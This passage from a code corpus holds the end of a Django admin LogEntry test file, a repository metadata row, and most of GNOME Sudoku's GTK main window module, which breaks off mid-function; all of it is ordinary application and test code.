logentry = LogEntry.objects.get(content_type__model__iexact="article")
action_time = logentry.action_time
logentry.save()
self.assertEqual(logentry.action_time, action_time)
def test_logentry_change_message(self):
"""
LogEntry.change_message is stored as a dumped JSON structure to be able
to get the message dynamically translated at display time.
"""
post_data = {
'site': self.site.pk, 'title': 'Changed', 'hist': 'Some content',
'created_0': '2008-03-12', 'created_1': '11:54',
}
change_url = reverse('admin:admin_utils_article_change', args=[quote(self.a1.pk)])
response = self.client.post(change_url, post_data)
self.assertRedirects(response, reverse('admin:admin_utils_article_changelist'))
logentry = LogEntry.objects.filter(content_type__model__iexact='article').latest('id')
self.assertEqual(logentry.get_change_message(), 'Changed title and hist.')
with translation.override('fr'):
self.assertEqual(logentry.get_change_message(), 'Modification de title et hist.')
add_url = reverse('admin:admin_utils_article_add')
post_data['title'] = 'New'
response = self.client.post(add_url, post_data)
self.assertRedirects(response, reverse('admin:admin_utils_article_changelist'))
logentry = LogEntry.objects.filter(content_type__model__iexact='article').latest('id')
self.assertEqual(logentry.get_change_message(), 'Added.')
with translation.override('fr'):
self.assertEqual(logentry.get_change_message(), 'Ajout.')
@override_settings(USE_L10N=True)
def test_logentry_change_message_localized_datetime_input(self):
"""
Localized date/time inputs shouldn't affect changed form data detection.
"""
post_data = {
'site': self.site.pk, 'title': 'Changed', 'hist': 'Some content',
'created_0': '12/03/2008', 'created_1': '11:54',
}
with translation.override('fr'):
change_url = reverse('admin:admin_utils_article_change', args=[quote(self.a1.pk)])
response = self.client.post(change_url, post_data)
self.assertRedirects(response, reverse('admin:admin_utils_article_changelist'))
logentry = LogEntry.objects.filter(content_type__model__iexact='article').latest('id')
self.assertEqual(logentry.get_change_message(), 'Changed title and hist.')
def test_logentry_change_message_formsets(self):
"""
All messages for changed formsets are logged in a change message.
"""
a2 = Article.objects.create(
site=self.site,
title="Title second article",
created=datetime(2012, 3, 18, 11, 54),
)
post_data = {
'domain': 'example.com', # domain changed
'admin_articles-TOTAL_FORMS': '5',
'admin_articles-INITIAL_FORMS': '2',
'admin_articles-MIN_NUM_FORMS': '0',
'admin_articles-MAX_NUM_FORMS': '1000',
# Changed title for 1st article
'admin_articles-0-id': str(self.a1.pk),
'admin_articles-0-site': str(self.site.pk),
'admin_articles-0-title': 'Changed Title',
# Second article is deleted
'admin_articles-1-id': str(a2.pk),
'admin_articles-1-site': str(self.site.pk),
'admin_articles-1-title': 'Title second article',
'admin_articles-1-DELETE': 'on',
# A new article is added
'admin_articles-2-site': str(self.site.pk),
'admin_articles-2-title': 'Added article',
}
change_url = reverse('admin:admin_utils_site_change', args=[quote(self.site.pk)])
response = self.client.post(change_url, post_data)
self.assertRedirects(response, reverse('admin:admin_utils_site_changelist'))
self.assertQuerysetEqual(Article.objects.filter(pk=a2.pk), [])
logentry = LogEntry.objects.filter(content_type__model__iexact='site').latest('action_time')
self.assertEqual(
json.loads(logentry.change_message),
[
{"changed": {"fields": ["domain"]}},
{"added": {"object": "Article object", "name": "article"}},
{"changed": {"fields": ["title"], "object": "Article object", "name": "article"}},
{"deleted": {"object": "Article object", "name": "article"}},
]
)
self.assertEqual(
logentry.get_change_message(),
'Changed domain. Added article "Article object". '
'Changed title for article "Article object". Deleted article "Article object".'
)
with translation.override('fr'):
self.assertEqual(
logentry.get_change_message(),
"Modification de domain. Ajout de article « Article object ». "
"Modification de title pour l'objet article « Article object ». "
"Suppression de article « Article object »."
)
def test_logentry_get_edited_object(self):
"""
LogEntry.get_edited_object() returns the edited object of a LogEntry
object.
"""
logentry = LogEntry.objects.get(content_type__model__iexact="article")
edited_obj = logentry.get_edited_object()
self.assertEqual(logentry.object_id, str(edited_obj.pk))
def test_logentry_get_admin_url(self):
"""
LogEntry.get_admin_url returns a URL to edit the entry's object or
None for non-existent (possibly deleted) models.
"""
logentry = LogEntry.objects.get(content_type__model__iexact='article')
expected_url = reverse('admin:admin_utils_article_change', args=(quote(self.a1.pk),))
self.assertEqual(logentry.get_admin_url(), expected_url)
self.assertIn('article/%d/change/' % self.a1.pk, logentry.get_admin_url())
logentry.content_type.model = "non-existent"
self.assertIsNone(logentry.get_admin_url())
def test_logentry_unicode(self):
log_entry = LogEntry()
log_entry.action_flag = ADDITION
self.assertTrue(six.text_type(log_entry).startswith('Added '))
log_entry.action_flag = CHANGE
self.assertTrue(six.text_type(log_entry).startswith('Changed '))
log_entry.action_flag = DELETION
self.assertTrue(six.text_type(log_entry).startswith('Deleted '))
# Make sure custom action_flags works
log_entry.action_flag = 4
self.assertEqual(six.text_type(log_entry), 'LogEntry Object')
def test_log_action(self):
content_type_pk = ContentType.objects.get_for_model(Article).pk
log_entry = LogEntry.objects.log_action(
self.user.pk, content_type_pk, self.a1.pk, repr(self.a1), CHANGE,
change_message='Changed something else',
)
self.assertEqual(log_entry, LogEntry.objects.latest('id'))
def test_recentactions_without_content_type(self):
"""
If a LogEntry is missing content_type it will not display it in span
tag under the hyperlink.
"""
response = self.client.get(reverse('admin:index'))
link = reverse('admin:admin_utils_article_change', args=(quote(self.a1.pk),))
should_contain = """<a href="%s">%s</a>""" % (escape(link), escape(repr(self.a1)))
self.assertContains(response, should_contain)
should_contain = "Article"
self.assertContains(response, should_contain)
logentry = LogEntry.objects.get(content_type__model__iexact='article')
# If the log entry doesn't have a content type it should still be
# possible to view the Recent Actions part (#10275).
logentry.content_type = None
logentry.save()
counted_presence_before = response.content.count(force_bytes(should_contain))
response = self.client.get(reverse('admin:index'))
counted_presence_after = response.content.count(force_bytes(should_contain))
self.assertEqual(counted_presence_before - 1, counted_presence_after)
def test_proxy_model_content_type_is_used_for_log_entries(self):
"""
Log entries for proxy models should have the proxy model's contenttype
(#21084).
"""
proxy_content_type = ContentType.objects.get_for_model(ArticleProxy, for_concrete_model=False)
post_data = {
'site': self.site.pk, 'title': "Foo", 'hist': "Bar",
'created_0': '2015-12-25', 'created_1': '00:00',
}
changelist_url = reverse('admin:admin_utils_articleproxy_changelist')
# add
proxy_add_url = reverse('admin:admin_utils_articleproxy_add')
response = self.client.post(proxy_add_url, post_data)
self.assertRedirects(response, changelist_url)
proxy_addition_log = LogEntry.objects.latest('id')
self.assertEqual(proxy_addition_log.action_flag, ADDITION)
self.assertEqual(proxy_addition_log.content_type, proxy_content_type)
# change
article_id = proxy_addition_log.object_id
proxy_change_url = reverse('admin:admin_utils_articleproxy_change', args=(article_id,))
post_data['title'] = 'New'
response = self.client.post(proxy_change_url, post_data)
self.assertRedirects(response, changelist_url)
proxy_change_log = LogEntry.objects.latest('id')
self.assertEqual(proxy_change_log.action_flag, CHANGE)
self.assertEqual(proxy_change_log.content_type, proxy_content_type)
# delete
proxy_delete_url = reverse('admin:admin_utils_articleproxy_delete', args=(article_id,))
response = self.client.post(proxy_delete_url, {'post': 'yes'})
self.assertRedirects(response, changelist_url)
proxy_delete_log = LogEntry.objects.latest('id')
self.assertEqual(proxy_delete_log.action_flag, DELETION)
self.assertEqual(proxy_delete_log.content_type, proxy_content_type)
| apache-2.0 |
Alberto-Beralix/Beralix | i386-squashfs-root/usr/share/pyshared/gnome_sudoku/main.py | 1 | 40160 | # -*- coding: utf-8 -*-
import os.path
import threading
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk,GdkPixbuf,GObject,Pango,Gdk
from gi.repository import LaunchpadIntegration
from gettext import gettext as _
from gettext import ngettext
import cairo
import dialog_swallower
import game_selector
import gsudoku
import printing
import saver
import sudoku_maker
import timer
import tracker_info
from defaults import (APPNAME, APPNAME_SHORT, AUTHORS, COPYRIGHT, DESCRIPTION, DOMAIN,
IMAGE_DIR, MIN_NEW_PUZZLES, UI_DIR, VERSION, WEBSITE, WEBSITE_LABEL)
from gtk_goodies import gconf_wrapper, Undo, dialog_extras
from simple_debug import simple_debug, options
def inactivate_new_game_etc (fun):
def inactivate_new_game_etc_ (ui, *args, **kwargs):
paths = [
'/MenuBar/Game/New',
'/MenuBar/Game/Reset',
'/MenuBar/Game/PuzzleInfo',
'/MenuBar/Game/Print',
# undo/redo is handled elsewhere as it can't simply be turned on/off.
'/MenuBar/Settings/ToggleToolbar',
'/MenuBar/Settings/ToggleHighlight',
'/MenuBar/Settings/AlwaysShowPossible',
'/MenuBar/Settings/ShowImpossibleImplications',
'/MenuBar/Tools/ShowPossible',
'/MenuBar/Tools/ClearTopNotes',
'/MenuBar/Tools/ClearBottomNotes',
'/MenuBar/Tools/Tracker',
]
for p in paths:
action = ui.uimanager.get_action(p)
if not action:
action = ui.uimanager.get_widget(p)
if not action:
print 'No action at path', p
else:
action.set_sensitive(False)
ret = fun(ui, *args, **kwargs)
for p in paths:
action = ui.uimanager.get_action(p)
if not action:
action = ui.uimanager.get_widget(p)
if not action:
print 'No action at path', p
else:
action.set_sensitive(True)
return ret
return inactivate_new_game_etc_
class UI (gconf_wrapper.GConfWrapper):
ui = '''<ui>
<menubar name="MenuBar">
<menu name="Game" action="Game">
<menuitem action="New"/>
<menuitem action="Reset"/>
<separator/>
<menuitem action="Undo"/>
<menuitem action="Redo"/>
<separator/>
<menuitem action="PuzzleInfo"/>
<separator/>
<menuitem action="Print"/>
<menuitem action="PrintMany"/>
<separator/>
<menuitem action="Close"/>
</menu>
<menu action="Settings">
<menuitem action="FullScreen"/>
<menuitem action="ToggleToolbar"/>
<separator/>
<menuitem action="ToggleHighlight"/>
<menuitem action="AlwaysShowPossible"/>
<menuitem action="ShowImpossibleImplications"/>
</menu>
<menu action="Tools">
<menuitem action="ShowPossible"/>
<separator/>
<menuitem action="ClearTopNotes"/>
<menuitem action="ClearBottomNotes"/>
<separator/>
<menuitem action="Tracker"/>
</menu>
<menu action="Help">
<menuitem action="ShowHelp"/>
<placeholder name='LaunchpadItems'/>
<menuitem action="About"/>
</menu>
</menubar>
<toolbar name="Toolbar">
<toolitem action="New"/>
<separator/>
<toolitem action="Undo"/>
<toolitem action="Redo"/>
<separator/>
<toolitem action="ShowPossible"/>
<separator/>
<toolitem action="Tracker"/>
</toolbar>
</ui>'''
initial_prefs = {'group_size':9,
'always_show_hints':False,
'difficulty':0.0,
'minimum_number_of_new_puzzles':MIN_NEW_PUZZLES,
'highlight':False,
'bg_color':'black',
'show_tracker':False,
'width': 700,
'height': 675,
'auto_save_interval':60 # auto-save interval in seconds...
}
@simple_debug
def __init__ (self, run_selector = True):
"""run_selector means that we start our regular game.
For testing purposes, it will be convenient to hand a
run_selector=False to this method to avoid running the dialog
and allow a tester to set up a game programmatically.
"""
gconf_wrapper.GConfWrapper.__init__(self,
gconf_wrapper.GConfWrap('gnome-sudoku')
)
self.setup_gui()
self.timer = timer.ActiveTimer(self.w)
self.gsd.set_timer(self.timer)
self.won = False
# add the accelerator group to our toplevel window
self.worker_connections = []
self.is_fullscreen = False
# setup sudoku maker...
self.sudoku_maker = sudoku_maker.SudokuMaker()
self.sudoku_tracker = saver.SudokuTracker()
# generate puzzles while our use is working...
self.show()
if run_selector:
self.do_stop()
if self.select_game():
# If this return True, the user closed...
self.quit = True
else:
self.quit = False
# Generate puzzles in background...
GObject.timeout_add_seconds(1, lambda *args: self.start_worker_thread() and True)
@inactivate_new_game_etc
def select_game (self):
self.tb.hide()
choice = game_selector.NewOrSavedGameSelector().run_swallowed_dialog(self.swallower)
if not choice:
return True
self.timer.start_timing()
if choice[0] == game_selector.NewOrSavedGameSelector.NEW_GAME:
self.gsd.change_grid(choice[1], 9)
if choice[0] == game_selector.NewOrSavedGameSelector.SAVED_GAME:
saver.open_game(self, choice[1])
if self.gconf['show_toolbar']:
self.tb.show()
if self.gconf['always_show_hints']:
self.gsd.update_all_hints()
if self.gconf['highlight']:
self.gsd.toggle_highlight(True)
def show (self):
self.gsd.show()
self.w.show()
def setup_gui (self):
self.initialize_prefs()
self.setup_main_window()
self.gsd = gsudoku.SudokuGameDisplay()
self.gsd.set_parent_for(self.w)
self.gsd.connect('puzzle-finished', self.you_win_callback)
self.setup_color()
self.setup_actions()
self.setup_undo()
self.setup_autosave()
self.w.add_accel_group(self.uimanager.get_accel_group())
# Add launchpad integration
LaunchpadIntegration.set_sourcepackagename("gnome-sudoku")
LaunchpadIntegration.add_ui(self.uimanager, "/MenuBar/Help/LaunchpadItems")
self.setup_main_boxes()
self.setup_tracker_interface()
self.setup_toggles()
def setup_main_window (self):
Gtk.Window.set_default_icon_name('gnome-sudoku')
self.w = Gtk.Window()
self.w.set_default_size(self.gconf['width'], self.gconf['height'])
self.w.set_title(APPNAME_SHORT)
self.w.connect('configure-event', self.resize_cb)
self.w.connect('delete-event', self.quit_cb)
self.uimanager = Gtk.UIManager()
def setup_actions (self):
self.main_actions = Gtk.ActionGroup('MainActions')
self.main_actions.add_actions([
('Game', None, _('_Game')),
('New', Gtk.STOCK_NEW, None, '<Control>n', _('New game'), self.new_cb),
('Reset', Gtk.STOCK_CLEAR, _('_Reset'), '<Control>b',
None, self.game_reset_cb),
('Undo', Gtk.STOCK_UNDO, _('_Undo'), '<Control>z',
_('Undo last action'), self.stop_dancer),
('Redo', Gtk.STOCK_REDO, _('_Redo'), '<Shift><Control>z',
_('Redo last action')),
('PuzzleInfo', Gtk.STOCK_ABOUT, _('Puzzle _Statistics...'), None,
None, self.show_info_cb),
('Print', Gtk.STOCK_PRINT, _('_Print...'), '<Control>p', None, self.print_game),
('PrintMany', Gtk.STOCK_PRINT, _('Print _Multiple Sudokus...'), None,
None, self.print_multiple_games),
('Close', Gtk.STOCK_CLOSE, None, '<Control>w', None, self.quit_cb),
('Settings', None, _('_Settings')),
('FullScreen', Gtk.STOCK_FULLSCREEN, None, 'F11', None, self.full_screen_cb),
('Tools', None, _('_Tools')),
('ShowPossible', Gtk.STOCK_DIALOG_INFO, _('_Hint'), '<Control>h',
_('Show a square that is easy to fill.'), self.show_hint_cb),
('ClearTopNotes', None, _('Clear _Top Notes'), '<Control>j',
None, self.clear_top_notes_cb),
('ClearBottomNotes', None, _('Clear _Bottom Notes'), '<Control>k',
None, self.clear_bottom_notes_cb),
('Help', None, _('_Help'), None, None, None),
('ShowHelp', Gtk.STOCK_HELP, _('_Contents'), 'F1', None, self.show_help),
('About', Gtk.STOCK_ABOUT, None, None, None, self.show_about),
])
self.main_actions.add_toggle_actions([
('AlwaysShowPossible',
None,
_('Show _Possible Numbers'),
None,
_('Always show possible numbers in a square'),
self.auto_hint_cb),
('ShowImpossibleImplications',
None,
_('Warn About _Unfillable Squares'),
None,
_('Warn about squares made unfillable by a move'),
self.impossible_implication_cb),
('Tracker', 'tracks', _('_Track Additions'),
'<Control>T',
_('Mark new additions in a separate color so you can keep track of them.'),
self.tracker_toggle_cb, False),
('ToggleToolbar', None, _('Show _Toolbar'), None, None, self.toggle_toolbar_cb, True),
('ToggleHighlight', Gtk.STOCK_SELECT_COLOR, _('_Highlighter'),
None, _('Highlight the current row, column and box'), self.toggle_highlight_cb, False)
])
self.main_actions.get_action('Undo').set_is_important(True)
self.main_actions.get_action('Redo').set_is_important(True)
self.main_actions.get_action('ShowPossible').set_is_important(True)
self.main_actions.get_action('Tracker').set_is_important(True)
self.uimanager.insert_action_group(self.main_actions, 0)
self.uimanager.add_ui_from_string(self.ui)
def setup_undo (self):
self.cleared = [] # used for Undo memory
self.cleared_notes = [] # used for Undo memory
# Set up our UNDO stuff
undo_widg = self.main_actions.get_action('Undo')
redo_widg = self.main_actions.get_action('Redo')
self.history = Undo.UndoHistoryList(undo_widg, redo_widg)
for entry in self.gsd.__entries__.values():
Undo.UndoableGenericWidget(entry, self.history,
set_method = 'set_value_for_undo',
get_method = 'get_value_for_undo',
pre_change_signal = 'value-about-to-change'
)
Undo.UndoableGenericWidget(entry, self.history,
set_method = 'set_notes_for_undo',
get_method = 'get_notes_for_undo',
signal = 'notes-changed',
pre_change_signal = 'notes-about-to-change',
)
def setup_color (self):
# setup background colors
bgcol = self.gconf['bg_color']
if bgcol != '':
self.gsd.set_bg_color(bgcol)
def setup_autosave (self):
GObject.timeout_add_seconds(self.gconf['auto_save_interval'] or 60, # in seconds...
self.autosave)
def setup_main_boxes (self):
self.vb = Gtk.VBox()
# Add menu bar and toolbar...
mb = self.uimanager.get_widget('/MenuBar')
mb.show()
self.vb.pack_start(mb, False, False, 0)
self.tb = self.uimanager.get_widget('/Toolbar')
self.tb.get_style_context().add_class(Gtk.STYLE_CLASS_PRIMARY_TOOLBAR)
self.vb.pack_start(self.tb, False, False, 0)
self.main_area = Gtk.HBox()
self.swallower = dialog_swallower.SwappableArea(self.main_area)
self.swallower.show()
self.vb.pack_start(self.swallower, True, True, 12)
self.main_area.pack_start(self.gsd, True, True, 6)
self.main_actions.set_visible(True)
self.game_box = Gtk.VBox()
self.main_area.show()
self.vb.show()
self.game_box.show()
self.main_area.pack_start(self.game_box, False, False, 12)
self.w.add(self.vb)
def setup_toggles (self):
# sync up toggles with gconf values...
map(lambda tpl: self.gconf_wrap_toggle(*tpl),
[('always_show_hints',
self.main_actions.get_action('AlwaysShowPossible')),
('show_impossible_implications',
self.main_actions.get_action('ShowImpossibleImplications')),
('show_toolbar',
self.main_actions.get_action('ToggleToolbar')),
('highlight',
self.main_actions.get_action('ToggleHighlight')),
('show_tracker',
self.main_actions.get_action('Tracker')),
])
@simple_debug
def start_worker_thread (self, *args):
n_new_puzzles = self.sudoku_maker.n_puzzles(new = True)
try:
if n_new_puzzles < self.gconf['minimum_number_of_new_puzzles']:
self.worker = threading.Thread(target = lambda *args: self.sudoku_maker.work(limit = 5))
self.worker_connections = [
self.timer.connect('timing-started', self.sudoku_maker.resume),
self.timer.connect('timing-stopped', self.sudoku_maker.pause)
]
self.worker.start()
except gconf_wrapper.GConfError:
pass # assume we have enough new puzzles
return True
@simple_debug
def stop_worker_thread (self, *args):
if hasattr(self, 'worker'):
self.sudoku_maker.stop()
for c in self.worker_connections:
self.timer.disconnect(c)
def stop_dancer (self, *args):
if hasattr(self, 'dancer'):
self.dancer.stop_dancing()
delattr(self, 'dancer')
def start_dancer (self):
import dancer
self.dancer = dancer.GridDancer(self.gsd)
self.dancer.start_dancing()
@simple_debug
def you_win_callback (self, grid):
if hasattr(self, 'dancer'):
return
self.won = True
# increase difficulty for next time.
self.gconf['difficulty'] = self.gconf['difficulty'] + 0.1
self.timer.finish_timing()
self.sudoku_tracker.finish_game(self)
if self.timer.active_time < 60:
seconds = int(self.timer.active_time)
sublabel = ngettext("You completed the puzzle in %d second",
"You completed the puzzle in %d seconds", seconds) % seconds
elif self.timer.active_time < 3600:
minutes = int(self.timer.active_time / 60)
seconds = int(self.timer.active_time - minutes*60)
minute_string = ngettext("%d minute", "%d minutes", minutes) % minutes
second_string = ngettext("%d second", "%d seconds", seconds) % seconds
sublabel = _("You completed the puzzle in %(minute)s and %(second)s") % {'minute': minute_string, 'second': second_string}
else:
hours = int(self.timer.active_time / 3600)
minutes = int((self.timer.active_time - hours*3600) / 60)
seconds = int(self.timer.active_time - hours*3600 - minutes*60)
hour_string = ngettext("%d hour", "%d hours", hours) % hours
minute_string = ngettext("%d minute", "%d minutes", minutes) % minutes
second_string = ngettext("%d second", "%d seconds", seconds) % seconds
sublabel = _("You completed the puzzle in %(hour)s, %(minute)s and %(second)s") % {'hour': hour_string, 'minute': minute_string, 'second': second_string}
sublabel += "\n"
sublabel += ngettext("You got %(n)s hint.", "You got %(n)s hints.", self.gsd.hints) % {'n':self.gsd.hints}
sublabel += "\n"
if self.gsd.impossible_hints:
sublabel += ngettext("You had %(n)s impossibility pointed out.",
"You had %(n)s impossibilities pointed out.",
self.gsd.impossible_hints) % {'n':self.gsd.impossible_hints}
sublabel += "\n"
self.start_dancer()
dialog_extras.show_message_dialog(_("You win!"), label = _("You win!"),
sublabel = sublabel
)
@simple_debug
def initialize_prefs (self):
for k, v in self.initial_prefs.items():
try:
self.gconf[k]
except:
self.gconf[k] = v
@simple_debug
@inactivate_new_game_etc
def new_cb (self, *args):
if (self.gsd.grid and self.gsd.grid.is_changed() and not self.won):
try:
if dialog_extras.show_boolean_dialog(
label = _("Save this game before starting new one?"),
custom_yes = _("_Save game for later"),
custom_no = _("_Abandon game"),
):
self.save_game()
else:
self.sudoku_tracker.abandon_game(self)
except dialog_extras.UserCancelledError:
# User cancelled new game
return
self.do_stop()
self.select_game()
@simple_debug
def stop_game (self):
if (self.gsd.grid
and self.gsd.grid.is_changed()
and (not self.won)):
try:
if dialog_extras.show_boolean_dialog(label = _("Save game before closing?")):
self.save_game(self)
except dialog_extras.UserCancelledError:
return
self.do_stop()
def do_stop (self):
self.stop_dancer()
self.gsd.grid = None
self.tracker_ui.reset()
self.history.clear()
self.won = False
self.old_tracker_view = None
@simple_debug
def resize_cb (self, widget, event, user_data=None):
self.gconf['width'] = event.width
self.gconf['height'] = event.height
@simple_debug
def quit_cb (self, *args):
self.w.hide()
if (self.gsd.grid
and self.gsd.grid.is_changed()
and (not self.won)):
self.save_game(self)
if Gtk.main_level() > 1:
# If we are in an embedded mainloop, that means that one
# of our "swallowed" dialogs is active, in which case we
# have to quit that mainloop before we can quit
# properly.
if self.swallower.running:
d = self.swallower.running
d.response(Gtk.ResponseType.DELETE_EVENT)
Gtk.main_quit() # Quit the embedded mainloop
GObject.idle_add(self.quit_cb, 100) # Call ourselves again
# to quit the main
# mainloop
return
# make sure we really go away before doing our saving --
# otherwise we appear sluggish.
while Gtk.events_pending():
Gtk.main_iteration()
self.stop_worker_thread()
# allow KeyboardInterrupts, which calls quit_cb outside the main loop
try:
Gtk.main_quit()
except RuntimeError:
pass
@simple_debug
def save_game (self, *args):
self.sudoku_tracker.save_game(self)
def full_screen_cb (self, *args):
if self.is_fullscreen:
self.w.unfullscreen()
self.is_fullscreen = False
else:
self.w.fullscreen()
self.is_fullscreen = True
@simple_debug
def game_reset_cb (self, *args):
clearer = Undo.UndoableObject(
self.do_game_reset, #action
self.undo_game_reset, #inverse
self.history #history
)
clearer.perform()
def do_game_reset (self, *args):
self.gsd.cover_track()
self.cleared.append(self.tinfo.save())
self.cleared.append(self.gsd.reset_grid())
self.cleared_notes.append((tracker_info.NO_TRACKER, self.gsd.clear_notes('All')))
self.tinfo.reset()
self.stop_dancer()
def undo_game_reset (self, *args):
self.tracker_ui.select_tracker(tracker_info.NO_TRACKER)
for entry in self.cleared.pop():
self.gsd.add_value(*entry)
self.tinfo.load(self.cleared.pop())
self.tracker_ui.select_tracker(self.tinfo.current_tracker)
self.gsd.show_track()
self.undo_clear_notes()
def clear_top_notes_cb (self, *args):
clearer = Undo.UndoableObject(
lambda *args: self.do_clear_notes('Top'), #action
self.undo_clear_notes, #inverse
self.history
)
clearer.perform()
def clear_bottom_notes_cb (self, *args):
clearer = Undo.UndoableObject(
lambda *args: self.do_clear_notes('Bottom'), #action
self.undo_clear_notes, #inverse
self.history
)
clearer.perform()
def do_clear_notes(self, side):
''' Clear top, bottom, or all notes - in undoable fashion
The side argument is used to specify which notes are to be cleared.
'Top' - Clear only the top notes
'Bottom' - Clear only the bottom notes
'''
self.cleared_notes.append((self.tinfo.current_tracker, self.gsd.clear_notes(side)))
# Turn off auto-hint if the player clears the bottom notes
if side == 'Bottom' and self.gconf['always_show_hints']:
always_show_hint_wdgt = self.main_actions.get_action('AlwaysShowPossible')
always_show_hint_wdgt.activate()
# Update the hints...in case we're redoing a clear of them
if self.gconf['always_show_hints']:
self.gsd.update_all_hints()
def undo_clear_notes(self):
''' Undo previously cleared notes
Clearing notes fills the cleared_notes list of notes that were cleared.
'''
cleared_tracker, cleared_notes = self.cleared_notes.pop()
# Change the tracker selection if it was tracking during the clear
if cleared_tracker != tracker_info.NO_TRACKER:
self.tracker_ui.select_tracker(cleared_tracker)
self.gsd.apply_notelist(cleared_notes)
# Update the hints...in case we're undoing over top of them
if self.gconf['always_show_hints']:
self.gsd.update_all_hints()
# Redraw the notes
self.gsd.update_all_notes()
# Make sure we're still dancing if we undo after win
if self.gsd.grid.check_for_completeness():
self.start_dancer()
@simple_debug
def show_hint_cb (self, *args):
self.gsd.show_hint()
@simple_debug
def auto_hint_cb (self, action, user_data=None):
if action.get_active():
self.gsd.always_show_hints = True
self.gsd.update_all_hints()
else:
self.gsd.always_show_hints = False
self.gsd.clear_notes('AutoHint')
@simple_debug
def impossible_implication_cb (self, action, user_data=None):
if action.get_active():
self.gsd.display_impossible_implications()
else:
self.gsd.hide_impossible_implications()
@simple_debug
def setup_tracker_interface (self):
self.tracker_ui = TrackerBox(self)
self.tracker_ui.show_all()
self.tracker_ui.hide()
self.tinfo = tracker_info.TrackerInfo()
self.old_tracker_view = None
self.game_box.add(self.tracker_ui)
@simple_debug
def tracker_toggle_cb (self, widg, user_data=None):
if widg.get_active():
if self.old_tracker_view:
self.tinfo.set_tracker_view(self.old_tracker_view)
self.tracker_ui.select_tracker(self.tinfo.current_tracker)
self.gsd.show_track()
self.tracker_ui.show_all()
else:
self.old_tracker_view = self.tinfo.get_tracker_view()
self.tracker_ui.hide_tracker_cb(None)
self.tracker_ui.hide()
@simple_debug
def toggle_toolbar_cb (self, widg, user_data=None):
if widg.get_active():
self.tb.show()
else:
self.tb.hide()
def toggle_highlight_cb (self, widg, user_data=None):
if widg.get_active():
self.gsd.toggle_highlight(True)
else:
self.gsd.toggle_highlight(False)
@simple_debug
def show_info_cb (self, *args):
if not self.gsd.grid:
dialog_extras.show_message_dialog(parent = self.w,
title = _("Puzzle Information"),
label = _("There is no current puzzle.")
)
return
puzzle = self.gsd.grid.virgin.to_string()
diff = self.sudoku_maker.get_difficulty(puzzle)
information = _("Calculated difficulty: ")
try:
information += {'easy': _('Easy'),
'medium': _('Medium'),
'hard': _('Hard'),
'very hard': _('Very Hard')}[diff.value_category()]
except KeyError:
information += diff.value_category()
information += " (%1.2f)" % diff.value
information += "\n"
information += _("Number of moves instantly fillable by elimination: ")
information += str(int(diff.instant_elimination_fillable))
information += "\n"
information += _("Number of moves instantly fillable by filling: ")
information += str(int(diff.instant_fill_fillable))
information += "\n"
information += _("Amount of trial-and-error required to solve: ")
information += str(len(diff.guesses))
dialog_extras.show_message_dialog(parent = self.w,
title = _("Puzzle Statistics"),
label = _("Puzzle Statistics"),
sublabel = information)
@simple_debug
def autosave (self):
# this is called on a regular loop and will autosave if we
# have reason to...
if self.gsd.grid and self.gsd.grid.is_changed() and not self.won:
self.sudoku_tracker.save_game(self)
return True
@simple_debug
def show_about (self, *args):
about = Gtk.AboutDialog(
transient_for=self.w,
program_name=APPNAME,
version=VERSION,
copyright=COPYRIGHT,
license_type=Gtk.License.GPL_2_0,
comments=DESCRIPTION,
authors=AUTHORS,
website=WEBSITE,
website_label=WEBSITE_LABEL,
logo_icon_name="gnome-sudoku",
translator_credits=_("translator-credits"))
about.connect("response", lambda d, r: d.destroy())
about.show()
@simple_debug
def show_help (self, *args):
try:
Gtk.show_uri(self.w.get_screen(), "ghelp:gnome-sudoku", Gtk.get_current_event_time())
except GObject.GError, error:
# FIXME: This should create a pop-up dialog
print _('Unable to display help: %s') % str(error)
@simple_debug
def print_game (self, *args):
printing.print_sudokus([self.gsd], self.w)
@simple_debug
def print_multiple_games (self, *args):
gp = printing.GamePrinter(self.sudoku_maker, self.gconf)
gp.run_dialog()
class TrackerBox (Gtk.VBox):
@simple_debug
def __init__ (self, main_ui):
GObject.GObject.__init__(self)
self.footprint_img = cairo.ImageSurface.create_from_png(
os.path.join(IMAGE_DIR, "footprints.png"));
self.builder = Gtk.Builder()
self.builder.set_translation_domain(DOMAIN)
self.builder.add_from_file(os.path.join(UI_DIR, 'tracker.ui'))
self.main_ui = main_ui
self.tinfo = tracker_info.TrackerInfo()
self.tinfo.ui = self
self.vb = self.builder.get_object('vbox1')
self.vb.unparent()
self.pack_start(self.vb, True, True, 0)
self.setup_actions()
self.setup_tree()
self.show_all()
@simple_debug
def reset (self):
for tree in self.tracker_model:
if tree[0] > -1:
self.tracker_model.remove(tree.iter)
self.tinfo.reset()
self.tracker_actions.set_sensitive(False)
@simple_debug
def setup_tree (self):
self.tracker_tree = self.builder.get_object('TrackerTreeView')
self.tracker_model = Gtk.ListStore(int, GdkPixbuf.Pixbuf, str)
self.tracker_model.set_sort_column_id(0, Gtk.SortType.ASCENDING)
self.tracker_tree.set_model(self.tracker_model)
col1 = Gtk.TreeViewColumn("", Gtk.CellRendererPixbuf(), pixbuf = 1)
rend = Gtk.CellRendererText()
col2 = Gtk.TreeViewColumn("", rend, text = 2)
col2.set_cell_data_func(rend, self.draw_tracker_name)
self.tracker_tree.append_column(col2)
self.tracker_tree.append_column(col1)
# Our initial row...
pixbuf = self.get_tracker_pixbuf(
(0, 0, 0)
)
self.tracker_model.append([-1, pixbuf, _('Untracked')])
self.tracker_tree.get_selection().connect('changed', self.selection_changed_cb)
@simple_debug
def setup_actions (self):
self.tracker_actions = Gtk.ActionGroup('tracker_actions')
self.tracker_actions.add_actions(
[('Remove',
Gtk.STOCK_CLEAR,
_('_Remove'),
None, _('Delete selected tracker.'),
self.remove_tracker_cb
),
('Hide',
Gtk.STOCK_CLEAR,
_('H_ide'),
None, _('Hide current tracker entries.'),
self.hide_tracker_cb
),
('Apply',
Gtk.STOCK_APPLY,
_('A_pply'),
None, _('Apply all tracked values and remove the tracker.'),
self.apply_tracker_cb
),
]
)
o = self.builder.get_object('RemoveTrackerButton')
o.set_related_action(self.tracker_actions.get_action('Remove'))
o = self.builder.get_object('HideTrackerButton')
o.set_related_action(self.tracker_actions.get_action('Hide'))
o = self.builder.get_object('ApplyTrackerButton')
o.set_related_action(self.tracker_actions.get_action('Apply'))
self.builder.get_object('AddTrackerButton').connect('clicked',
self.add_tracker)
# Default to insensitive (they only become sensitive once a tracker is added)
self.tracker_actions.set_sensitive(False)
def draw_tracker_name(self, column, cell, model, iter, user_data=None):
if model.get_value(iter, 0) == self.tinfo.showing_tracker:
